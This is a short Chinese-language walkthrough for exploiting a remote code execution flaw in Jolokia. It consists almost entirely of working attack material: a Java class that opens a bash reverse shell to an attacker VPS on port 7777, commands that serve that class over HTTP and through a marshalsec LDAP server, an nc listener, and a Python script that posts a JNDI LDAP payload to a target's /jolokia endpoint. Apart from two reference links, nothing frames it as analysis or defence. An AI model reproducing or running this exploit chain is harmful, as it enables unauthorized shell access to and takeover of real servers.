Jolokia RCE漏洞利用
傅俊德
利用步骤
1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java
public class Exploit {
public Exploit() {
try {
System.setSecurityManager(null);
java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp/VPS地址/7777 0>&1`");
} catch(Exception e) {
e.printStackTrace();
}
}
}
2、在Exploit.java目录下开启一个web服务
python3 -m http.server 80
3、运行LDAP服务器在1389端口
marshalsec-0.0.3-SNAPSHOT-all.jar下载地址
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS地址/#Exploit 1389
4、nc开启监听
nc -lvp 7777
5、执行exp
import requests
#url = 'http://x.x.x.x/jolokia/..;/jolokia/'
url = 'http://x.x.x.x/jolokia'
headers = {
"Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Content-Type": "application/x-www-form-urlencoded",
}
data = '''{
"type" : "read",
"mbean" : "java.lang:type=Memory",
"target" : {
"url" : "service:jmx:rmi:///jndi/ldap://VPS地址:1389/Exploit"
}
}'''
result = requests.post(url, headers=headers, data=data, timeout=5)
参考文章
https://xz.aliyun.com/t/2294
https://www.cnblogs.com/cwkiller/p/13397335.html
类似资料: